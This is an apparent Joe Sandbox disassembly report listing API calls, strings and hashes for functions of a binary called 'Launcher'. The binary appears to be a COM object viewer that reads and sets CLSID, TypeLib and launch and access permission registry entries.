                                                                                                                • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00B61AA7
                                                                                                                • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00B61AAF
                                                                                                                • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00B61AB7
                                                                                                                • #1258.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B521A0), ref: 00B61B1E
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B61B2B
                                                                                                                • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B61B35
                                                                                                                • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B61B41
                                                                                                                • #4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00B61B4F
                                                                                                                • #4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00B61B59
                                                                                                                • #540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00B61B61
                                                                                                                • #3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00B61B77
                                                                                                                • #2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00B61B8C
                                                                                                                • #2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00B61B99
                                                                                                                • #3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00B61BA6
                                                                                                                • #3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00B61BB8
                                                                                                                • wsprintfW.USER32 ref: 00B61BE8
                                                                                                                • #5568.MFC42U(000000FF), ref: 00B61BF6
                                                                                                                • #6399.MFC42U(?,?,?,000000FF), ref: 00B61C09
                                                                                                                • #800.MFC42U(?,?,?,000000FF), ref: 00B61C11
                                                                                                                • #800.MFC42U(?,?,?,000000FF), ref: 00B61C19
                                                                                                                • #800.MFC42U(?,?,?,000000FF), ref: 00B61C21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#540$#4155$isspace$#2910#3792#6205isdigit$#1258#2970#3517#3865#5568#5906#6191#6399#858H_prolog3_H_prolog3_catch_isxdigittoupperwsprintf
                                                                                                                • String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,$,
                                                                                                                • API String ID: 708604890-3364495680
                                                                                                                • Opcode ID: 0e6841191a31a923e004b5f4a1e5096f92d3fbe021428eebe4b9df5a61f02369
                                                                                                                • Instruction ID: 867fa59f7bc948d0c8597755c357a7ca86cd297b31a29792a2abd08dc8489ef4
                                                                                                                • Opcode Fuzzy Hash: 0e6841191a31a923e004b5f4a1e5096f92d3fbe021428eebe4b9df5a61f02369
                                                                                                                • Instruction Fuzzy Hash: 3FA10B71E0010CEACF11EFE4C986ADDFBF9EF18300F5845A6E115A7181EB796A4ACB50
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B604BA
                                                                                                                  • Part of subcall function 00B6D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00B6D152
                                                                                                                  • Part of subcall function 00B6D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00B6D163
                                                                                                                  • Part of subcall function 00B6D0B6: wsprintfW.USER32 ref: 00B6D179
                                                                                                                  • Part of subcall function 00B6D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00B6D1AA
                                                                                                                  • Part of subcall function 00B6D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00B6D25C
                                                                                                                  • Part of subcall function 00B6D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6D270
                                                                                                                  • Part of subcall function 00B6D0B6: wsprintfW.USER32 ref: 00B6D286
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B604E6
                                                                                                                • SetCursor.USER32(00000000), ref: 00B604ED
                                                                                                                  • Part of subcall function 00B6DE06: malloc.MSVCRT ref: 00B6DE1E
                                                                                                                • #538.MFC42U(new CSecurityDescriptor failed.), ref: 00B60528
                                                                                                                • #800.MFC42U(?,00000000,MakeSelfRelativeSD failed), ref: 00B60754
                                                                                                                  • Part of subcall function 00B6CDEB: free.MSVCRT ref: 00B6CE45
                                                                                                                  • Part of subcall function 00B6CDEB: free.MSVCRT ref: 00B6CE55
                                                                                                                  • Part of subcall function 00B6CDEB: free.MSVCRT ref: 00B6CE6D
                                                                                                                • #538.MFC42U(00000000,00000000), ref: 00B60575
                                                                                                                • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,Interactive,00000001,Administrators,00000001,System,00000001,00000000), ref: 00B605BC
                                                                                                                • malloc.MSVCRT ref: 00B605C8
                                                                                                                • #538.MFC42U(00000000), ref: 00B605F5
                                                                                                                • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 00B60610
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 00B60659
                                                                                                                • GetSecurityDescriptorLength.ADVAPI32(?), ref: 00B60666
                                                                                                                • RegSetValueExW.ADVAPI32(?,LaunchPermission,00000000,00000003,?,00000000), ref: 00B6067C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B60688
                                                                                                                • free.MSVCRT ref: 00B6068F
                                                                                                                • #2634.MFC42U(00000001), ref: 00B606B9
                                                                                                                • #2634.MFC42U(00000001,00000001), ref: 00B606C6
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B606D9
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B606E9
                                                                                                                • #5977.MFC42U ref: 00B606F2
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B606FD
                                                                                                                • SetCursor.USER32(00000000), ref: 00B60704
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
                                                                                                                • String ID: Administrators$CSecurityDescriptor::Initialize failed.$Interactive$LaunchPermission$MakeSelfRelativeSD failed$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
                                                                                                                • API String ID: 3894545846-2955734171
                                                                                                                • Opcode ID: ead243c66b76aeddbf77e87b1d7f11bc940c7779ed28e663890950253c57c38e
                                                                                                                • Instruction ID: 5105370e9cc26eda45a25f721141befb5135c512fd6e2df2e1dfee66a73d66f6
                                                                                                                • Opcode Fuzzy Hash: ead243c66b76aeddbf77e87b1d7f11bc940c7779ed28e663890950253c57c38e
                                                                                                                • Instruction Fuzzy Hash: 8C616171940215ABDB24BB60DC9AFEE7AF4EF55701F0004E8F90AAB191DF785E858F60
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B6B8DC
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B6B8F4
                                                                                                                • SetCursor.USER32(00000000), ref: 00B6B8FB
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B6B911
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B6B924
                                                                                                                • SetCursor.USER32(00000000), ref: 00B6B92B
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6B94C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B6BAA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$CloseH_prolog3OpenQueryValue
                                                                                                                • String ID: AccessPermission$Administrators$CSecurityDescriptor::Initialize failed.$DefaultAccessPermission$DefaultLaunchPermission$Interactive$LaunchPermission$System$new CSecurityDescriptor failed.
                                                                                                                • API String ID: 2619828013-2246421441
                                                                                                                • Opcode ID: 70617403299387715422338090e0200f3063800eda078fdad21c42b10a527e33
                                                                                                                • Instruction ID: 62844ae477ef1c5e1d00ee11f594a3a0778291a13a7978c365ebd61c2cb11c15
                                                                                                                • Opcode Fuzzy Hash: 70617403299387715422338090e0200f3063800eda078fdad21c42b10a527e33
                                                                                                                • Instruction Fuzzy Hash: 07913F71A002169BDF159FA0DC85EBE7BF5EF48712F1404A9F906E71A1DB389D80DB60
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5FE6A
                                                                                                                • #6330.MFC42U(00000001,00000408), ref: 00B5FE73
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00B5FF2B
                                                                                                                • SendMessageW.USER32(?,00000148,00000000,?), ref: 00B5FF44
                                                                                                                • lstrcmpW.KERNEL32(?,None), ref: 00B5FF56
                                                                                                                • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00B5FFC4
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B6000B
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00B60067
                                                                                                                • SendMessageW.USER32(?,00000148,00000000,?), ref: 00B60080
                                                                                                                • lstrcmpW.KERNEL32(?,None), ref: 00B60092
                                                                                                                • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00B60111
                                                                                                                • #4118.MFC42U ref: 00B6011D
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B60135
                                                                                                                • #540.MFC42U(?,?,00B521A0,DllSurrogate), ref: 00B60192
                                                                                                                • #3871.MFC42U(?), ref: 00B601A8
                                                                                                                • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00B601F7
                                                                                                                • #800.MFC42U(?,TreatAs,?,?), ref: 00B60203
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Delete$lstrcmp$#3871#4118#540#6330#800H_prolog3_
                                                                                                                • String ID: DllSurrogate$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
                                                                                                                • API String ID: 3854995924-1653547741
                                                                                                                • Opcode ID: d91cd0edd2fdff8841351bcdb450026b70fef7be486ea566ad0419fec8a1a4d0
                                                                                                                • Instruction ID: 17622def401316920ed30bd53318550cff23cde60e8620b02e28a7daffc7eefa
                                                                                                                • Opcode Fuzzy Hash: d91cd0edd2fdff8841351bcdb450026b70fef7be486ea566ad0419fec8a1a4d0
                                                                                                                • Instruction Fuzzy Hash: 3A916031640605EAEB12FE248D87BB737E6EF02B01F4405E5BE046F1A6DBF56E488A51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B6D4CD: GetVersionExW.KERNEL32(?), ref: 00B6D4F3
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E1E5
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E1F9
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E219
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E242
                                                                                                                • #6211.MFC42U(00000005,?,?,?), ref: 00B5E259
                                                                                                                • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00B5E268
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E277
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E28E
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E2A6
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E2BD
                                                                                                                • SendMessageW.USER32(?,0000133E,00000000,00000001), ref: 00B5E2DE
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E30F
                                                                                                                • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00B5E326
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E345
                                                                                                                • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00B5E35C
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E372
                                                                                                                • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00B5E389
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E3A6
                                                                                                                • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00B5E3BD
                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B5E3D0
                                                                                                                • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00B5E3EB
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?), ref: 00B5E3FE
                                                                                                                  • Part of subcall function 00B5E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E482
                                                                                                                  • Part of subcall function 00B5E466: #6211.MFC42U(00000005,?,?,?,?,?,00B5E130,?,?), ref: 00B5E49B
                                                                                                                  • Part of subcall function 00B5E466: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00B5E4AA
                                                                                                                  • Part of subcall function 00B5E466: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E4BE
                                                                                                                  • Part of subcall function 00B5E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E4ED
                                                                                                                  • Part of subcall function 00B5E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E504
                                                                                                                  • Part of subcall function 00B5E466: SendMessageW.USER32(?,0000133E,00000000,?), ref: 00B5E528
                                                                                                                  • Part of subcall function 00B5E466: SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B5E53B
                                                                                                                  • Part of subcall function 00B5E466: SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00B5E555
                                                                                                                  • Part of subcall function 00B5E466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00B5E130,?,?), ref: 00B5E569
                                                                                                                  • Part of subcall function 00B5E466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00B5E130,?,?), ref: 00B5E578
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$RedrawWindow$#6211$Version
                                                                                                                • String ID: Access Permissions$Activation$Implementation$Launch Permissions$Registry
                                                                                                                • API String ID: 3082685337-2693731033
                                                                                                                • Opcode ID: bcc92a43b7c28ed8fadbe74c049e4324e11e08b161bdd645ec9b0a6453e18b65
                                                                                                                • Instruction ID: c5bea4cd677e2e2dda38ea6a1d04244fec04460898539f097e59863eff14df12
                                                                                                                • Opcode Fuzzy Hash: bcc92a43b7c28ed8fadbe74c049e4324e11e08b161bdd645ec9b0a6453e18b65
                                                                                                                • Instruction Fuzzy Hash: E2512130500645BEEB2A1B21DC4DFAB7AFDFB86B06F010498F96E921A0DF756D45CA60
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5C15A
                                                                                                                  • Part of subcall function 00B6D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00B6D152
                                                                                                                  • Part of subcall function 00B6D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00B6D163
                                                                                                                  • Part of subcall function 00B6D0B6: wsprintfW.USER32 ref: 00B6D179
                                                                                                                  • Part of subcall function 00B6D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00B6D1AA
                                                                                                                  • Part of subcall function 00B6D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00B6D25C
                                                                                                                  • Part of subcall function 00B6D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6D270
                                                                                                                  • Part of subcall function 00B6D0B6: wsprintfW.USER32 ref: 00B6D286
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B5C186
                                                                                                                • SetCursor.USER32(00000000), ref: 00B5C18D
                                                                                                                  • Part of subcall function 00B6DE06: malloc.MSVCRT ref: 00B6DE1E
                                                                                                                • #538.MFC42U(new CSecurityDescriptor failed.), ref: 00B5C1C8
                                                                                                                • #800.MFC42U(?,00000008,00000000), ref: 00B5C1E8
                                                                                                                  • Part of subcall function 00B6CDEB: free.MSVCRT ref: 00B6CE45
                                                                                                                  • Part of subcall function 00B6CDEB: free.MSVCRT ref: 00B6CE55
                                                                                                                  • Part of subcall function 00B6CDEB: free.MSVCRT ref: 00B6CE6D
                                                                                                                • #538.MFC42U(00000000,00000000), ref: 00B5C21A
                                                                                                                • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,?,00000001,?,System,00000001,00000000), ref: 00B5C266
                                                                                                                • malloc.MSVCRT ref: 00B5C272
                                                                                                                • #538.MFC42U(00000000), ref: 00B5C29F
                                                                                                                • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 00B5C2CE
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 00B5C313
                                                                                                                • GetSecurityDescriptorLength.ADVAPI32(?), ref: 00B5C320
                                                                                                                • RegSetValueExW.ADVAPI32(?,AccessPermission,00000000,00000003,?,00000000), ref: 00B5C336
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B5C342
                                                                                                                • free.MSVCRT ref: 00B5C349
                                                                                                                • #2634.MFC42U(00000001), ref: 00B5C373
                                                                                                                • #2634.MFC42U(00000001,00000001), ref: 00B5C380
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B5C393
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B5C3A3
                                                                                                                • #5977.MFC42U ref: 00B5C3AC
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B5C3B7
                                                                                                                • SetCursor.USER32(00000000), ref: 00B5C3BE
                                                                                                                Strings
                                                                                                                • psdSelfRelative malloc failed., xrefs: 00B5C298
                                                                                                                • System, xrefs: 00B5C22B
                                                                                                                • AccessPermission, xrefs: 00B5C32B
                                                                                                                • CSecurityDescriptor::Initialize failed., xrefs: 00B5C213
                                                                                                                • new CSecurityDescriptor failed., xrefs: 00B5C1BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
                                                                                                                • String ID: AccessPermission$CSecurityDescriptor::Initialize failed.$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
                                                                                                                • API String ID: 3894545846-3913380516
                                                                                                                • Opcode ID: fee72f6101a55d5421fceba6982c62dfe2c59e0006217ac316dea4586cc7376b
                                                                                                                • Instruction ID: 14d1dad8514004012f251dd512b5275465fa3e2c3d4a332c496be141afa4ae7b
                                                                                                                • Opcode Fuzzy Hash: fee72f6101a55d5421fceba6982c62dfe2c59e0006217ac316dea4586cc7376b
                                                                                                                • Instruction Fuzzy Hash: C8515171940219ABDB20AF60DC8AFEE7AF5EF55701F1044E9F909AB192CF745E84CB60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B67980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6798C
                                                                                                                  • Part of subcall function 00B678ED: GetFocus.USER32 ref: 00B678ED
                                                                                                                  • Part of subcall function 00B678ED: #2859.MFC42U(00000000), ref: 00B678F4
                                                                                                                  • Part of subcall function 00B678FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00B6790C
                                                                                                                • CLSIDFromString.OLE32(00000000,?,00000100), ref: 00B6312B
                                                                                                                • wcstok.MSVCRT ref: 00B63191
                                                                                                                • wcstol.MSVCRT ref: 00B6319A
                                                                                                                • wcstok.MSVCRT ref: 00B631BA
                                                                                                                • wcstol.MSVCRT ref: 00B631C3
                                                                                                                • #1662.MFC42U(Version,00B521A0,?,00000100,00000100), ref: 00B631DE
                                                                                                                • GetUserDefaultLCID.KERNEL32(Version,00B521A0,?,00000100,00000100), ref: 00B631E3
                                                                                                                • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B6320F
                                                                                                                • GetSystemDefaultLCID.KERNEL32 ref: 00B63227
                                                                                                                • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B6326D
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 00B6329A
                                                                                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 00B632B5
                                                                                                                • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00B632CC
                                                                                                                • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00B632EA
                                                                                                                • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B63330
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00B63342
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B6334E
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B6335A
                                                                                                                • wsprintfW.USER32 ref: 00B63395
                                                                                                                • #2644.MFC42U ref: 00B633A4
                                                                                                                • #538.MFC42U(?), ref: 00B633B6
                                                                                                                • #800.MFC42U(?,00000000,?), ref: 00B633DB
                                                                                                                • #2644.MFC42U ref: 00B633E8
                                                                                                                  • Part of subcall function 00B61C95: __EH_prolog3_GS.LIBCMT ref: 00B61C9F
                                                                                                                  • Part of subcall function 00B61C95: StringFromGUID2.OLE32(?,?,00000028,000002BC,00B64FBE,00000000,00B59ECC,?), ref: 00B61CCE
                                                                                                                  • Part of subcall function 00B61C95: wsprintfW.USER32 ref: 00B61CE4
                                                                                                                  • Part of subcall function 00B61C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00B61D1A
                                                                                                                  • Part of subcall function 00B61C95: lstrcpyW.KERNEL32(?,<no name>), ref: 00B61D30
                                                                                                                  • Part of subcall function 00B61C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00B61D9E
                                                                                                                  • Part of subcall function 00B61C95: RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00B61DEE
                                                                                                                  • Part of subcall function 00B61C95: CLSIDFromString.OLE32(?,?), ref: 00B61E06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromString$CloseLoadOpenQueryTypeValue$#2644DefaultMessageSendwcstokwcstolwsprintf$#1662#2859#538#800FocusH_prolog3_SystemUserlstrcpy
                                                                                                                • String ID: LoadRegTypeLib(%u, %u, %lu, &u ...) failed.$TypeLib$Version
                                                                                                                • API String ID: 672647845-2616143947
                                                                                                                • Opcode ID: 20917bb84bd827eaa7cd0cdd1589d2538e0bbc832d0ce1eb742fc184f53e87c1
                                                                                                                • Instruction ID: 84484d4d74fd6932a3d4d66ed8a007792121840d0b1267c9c3e1f241bce9887f
                                                                                                                • Opcode Fuzzy Hash: 20917bb84bd827eaa7cd0cdd1589d2538e0bbc832d0ce1eb742fc184f53e87c1
                                                                                                                • Instruction Fuzzy Hash: 72C1F5719042289FEB209F60CC49BA9B7FAFF89315F0045EAE509A7250DB765EA48F11
                                                                                                                APIs
                                                                                                                • #1662.MFC42U(F6B930CF), ref: 00B64CA5
                                                                                                                • GetUserDefaultLCID.KERNEL32(F6B930CF), ref: 00B64CAA
                                                                                                                • LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00B64CDA
                                                                                                                • GetSystemDefaultLCID.KERNEL32 ref: 00B64CF2
                                                                                                                • LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00B64D3C
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 00B64D69
                                                                                                                • StringFromGUID2.OLE32(-00000008,?,00000027), ref: 00B64D84
                                                                                                                • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00B64D9B
                                                                                                                • memset.MSVCRT ref: 00B64DB7
                                                                                                                • wnsprintfW.SHLWAPI ref: 00B64DE0
                                                                                                                • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00B64DFD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open$DefaultLoadType$#1662FromStringSystemUsermemsetwnsprintf
                                                                                                                • String ID: %u.%u$LoadRegTypeLib(%s, %u, %u, %lu, ...) failed.$TypeLib
                                                                                                                • API String ID: 2064963674-2378697407
